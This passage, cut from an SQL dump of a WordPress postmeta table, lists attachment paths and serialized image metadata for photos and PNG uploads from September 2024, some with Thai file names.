ime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:286818;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656596_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20822;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3009,1129,'_wp_attached_file','2024/09/S__69656598_0.jpg'),
(3010,1129,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/09/S__69656598_0.jpg\";s:8:\"filesize\";i:531011;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69656598_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16494;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69656598_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140880;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656598_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8243;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69656598_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85229;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69656598_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:273146;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69656598_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3011,1130,'_wp_attached_file','2024/09/3923_0-1.jpg'),
(3012,1130,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1705;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2024/09/3923_0-1.jpg\";s:8:\"filesize\";i:217068;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"3923_0-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18339;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"3923_0-1-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127669;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"3923_0-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9303;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"3923_0-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81357;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"3923_0-1-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:232588;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"3923_0-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23466;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3014,1108,'_thumbnail_id','1130'),
(3015,1108,'_edit_last','1'),
(3016,1108,'title_style','default'),
(3017,1108,'_title_style','field_5d1a0217cf408'),
(3018,1108,'related',''),
(3019,1108,'_related','field_603b51c3e183e'),
(3020,1131,'title_style','default'),
(3021,1131,'_title_style','field_5d1a0217cf408'),
(3022,1131,'related',''),
(3023,1131,'_related','field_603b51c3e183e'),
(3024,1132,'_edit_lock','1725592037:1'),
(3025,1133,'_wp_attached_file','2024/09/32-2567.png'),
(3026,1133,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/09/32-2567.png\";s:8:\"filesize\";i:2918592;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"32-2567-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:103085;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"32-2567-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:866795;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"32-2567-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41074;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"32-2567-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:969179;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"32-2567-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1776933;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"32-2567-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99075;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3028,1132,'_edit_last','1'),
(3029,1132,'title_style','default'),
(3030,1132,'_title_style','field_5d1a0217cf408'),
(3031,1132,'related',''),
(3032,1132,'_related','field_603b51c3e183e'),
(3033,1134,'title_style','default'),
(3034,1134,'_title_style','field_5d1a0217cf408'),
(3035,1134,'related',''),
(3036,1134,'_related','field_603b51c3e183e'),
(3038,1132,'_thumbnail_id','1133'),
(3039,1136,'_edit_lock','1746764298:1'),
(3040,1137,'_wp_attached_file','2024/09/33-2567.png'),
(3041,1137,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:19:\"2024/09/33-2567.png\";s:8:\"filesize\";i:3025295;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"33-2567-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98910;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"33-2567-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:814110;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"33-2567-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:42445;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"33-2567-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:916346;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:21:\"33-2567-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1760642;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"33-2567-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104351;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3043,1136,'_thumbnail_id','1137'),
(3044,1136,'_edit_last','1'),
(3045,1136,'title_style','default'),
(3046,1136,'_title_style','field_5d1a0217cf408'),
(3047,1136,'related',''),
(3048,1136,'_related','field_603b51c3e183e'),
(3049,1138,'title_style','default'),
(3050,1138,'_title_style','field_5d1a0217cf408'),
(3051,1138,'related',''),
(3052,1138,'_related','field_603b51c3e183e'),
(3053,1139,'_edit_lock','1726152132:1'),
(3054,1140,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_17.jpg'),
(3055,1140,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_17.jpg\";s:8:\"filesize\";i:342593;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_17-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14362;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_17-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100180;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7331;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_17-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62906;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_17-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190649;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_17-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17888;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3056,1141,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_15.jpg'),
(3057,1142,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_13.jpg'),
(3058,1141,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_15.jpg\";s:8:\"filesize\";i:372597;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_15-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14751;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_15-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108296;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7398;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_15-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66916;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_15-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207672;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_15-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18672;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3059,1142,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_13.jpg\";s:8:\"filesize\";i:424988;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_13-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16952;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_13-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125997;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8498;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_13-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78233;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_13-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239209;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_13-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21845;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3060,1143,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_12.jpg'),
(3061,1143,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_12.jpg\";s:8:\"filesize\";i:472415;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17218;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_12-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138527;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8725;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_12-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84853;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_12-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:266125;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_12-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22872;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3062,1144,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_14.jpg'),
(3063,1145,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_16.jpg'),
(3064,1144,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_14.jpg\";s:8:\"filesize\";i:285737;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_14-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14267;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_14-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92370;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7624;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_14-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59562;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_14-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:169570;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_14-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17847;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3065,1145,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_16.jpg\";s:8:\"filesize\";i:365001;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_16-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15224;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_16-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108960;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7484;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_16-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68576;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_16-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206561;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_16-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19192;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3066,1146,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_11.jpg'),
(3067,1146,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_11.jpg\";s:8:\"filesize\";i:311909;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_11-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15084;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_11-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108149;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6268;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_11-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67220;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_11-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15689;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3068,1147,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_10.jpg'),
(3069,1147,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:55:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_10.jpg\";s:8:\"filesize\";i:406798;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16434;}s:5:\"large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_10-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122117;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7953;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_10-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76311;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_10-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\"